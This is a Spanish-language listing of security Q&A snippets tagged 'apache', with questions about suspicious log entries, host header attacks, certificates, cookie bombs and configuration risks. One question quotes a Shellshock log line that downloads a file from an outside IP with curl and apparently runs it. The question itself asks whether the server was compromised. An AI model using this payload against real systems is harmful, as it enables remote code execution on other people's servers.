Preguntas con etiqueta 'apache'

preguntas con etiqueta
1
respuesta

URL de solicitud extraña recibida en mis registros de acceso TOMCAT

He recibido alguna URL de solicitud extraña en mis registros de acceso TOMCAT. que es el siguiente: - \x16\x03\x01\x01\"\x01" 200 40788 como se ve claramente en el registro anterior, el servidor ha dado 200(success) de respuesta al c...
hecha 20.07.2017 - 09:26
1
respuesta

¿Cómo prevenir un ataque de encabezado de host en Ubuntu Server 14.04?

Si enviamos una solicitud desde cualquier host como example.com , nuestro servidor devuelve un estado de respuesta HTTP 1.1 200 OK . En las condiciones correctas, debe mostrar el estado del mensaje de error 302, 400 o 404 (respues...
hecha 02.03.2017 - 11:02
2
respuestas

"CHANGELOG.txt" en los registros de Apache

Recientemente he visto un aumento importante en el siguiente tipo de solicitudes a mis registros de Apache:    "GET /CHANGELOG.txt HTTP / 1.1" 404 211 Hace aproximadamente un mes, no recibí ninguno. Ahora recibo una docena más o menos cad...
hecha 22.03.2016 - 17:00
1
respuesta

¿Los archivos de clase php expuestos son una vulnerabilidad de seguridad?

Actualmente estoy tratando de hacer que una vieja aplicación web PHP sea un poco más segura. Actualmente, la configuración de apache es tal que todos los archivos de clase de la aplicación están disponibles para el acceso de los usuarios (aunque...
hecha 08.12.2015 - 15:20
1
respuesta

¿Cómo elige un navegador qué certificado usar si mi servidor web tiene varios certificados?

Estoy usando Apache 2.4, con dos certificados, un RSA firmado por CACert y un ECC autofirmado. Ninguno de estos certificados proporciona una ruta a un certificado raíz de confianza confiable. Mi pregunta es la siguiente: cuando se presentan do...
hecha 18.11.2014 - 15:18
2
respuestas

¿Cómo prevenir las Cookie-Bombs?

Egor Homakov hizo una buena reseña ( Cookie Bomb o rompamos la Internet ) sobre cómo bloquear CDN y otros sitios web con cookies. Aunque este es un DOS del lado del navegador / usuario, me pregunto cómo se podría detener esto en el lado del s...
hecha 21.07.2014 - 08:00
1
respuesta

Hablando de HTTP simple a través de un puerto de servidor habilitado para SSL [cerrado]

atm Estoy enfrentando un problema con IE y Firefox porque no redirigen mis enlaces correctamente. Solicito mi solicitud a través de: https://myapp.example.de/context En mi aplicación web tengo enlaces como esos: http://myapp.example.de:44...
hecha 25.11.2013 - 15:23
2
respuestas

Versión de Apache falsa positiva en los resultados del escáner en Centos

Recientemente, necesito cuidar muchas vulnerabilidades falsas positivas en los resultados del escáner en la versión Apache. Ejemplo de vulnerabilidad falsa positiva: Apache 2.2 < 2.2.16 Multiple Vulnerabilities Nuestros clientes ejecutan...
hecha 27.12.2013 - 17:59
1
respuesta

Los registros de Apache muestran la ejecución de los comandos

Me pregunto si mi servidor está comprometido o no. Solo miré mi registro y vi la siguiente línea allí: IP: 173.249.4.160, Date: 27-12-17, Time:09:52:51, Browser: () { :;}; /bin/bash -c "curl -o /tmp/zmuie http://162.243.117.130/zmuie;/usr/bi...
hecha 28.12.2017 - 20:24
1
respuesta

¿Cuál es el problema de seguridad de las Opciones FollowSymLinks en la configuración de Apache?

¿Cuál es el problema de seguridad para usar Options FollowSymLinks en la configuración de Apache? Usamos la siguiente configuración: AllowOverride None Options None FollowSymLinks     
hecha 22.05.2017 - 10:36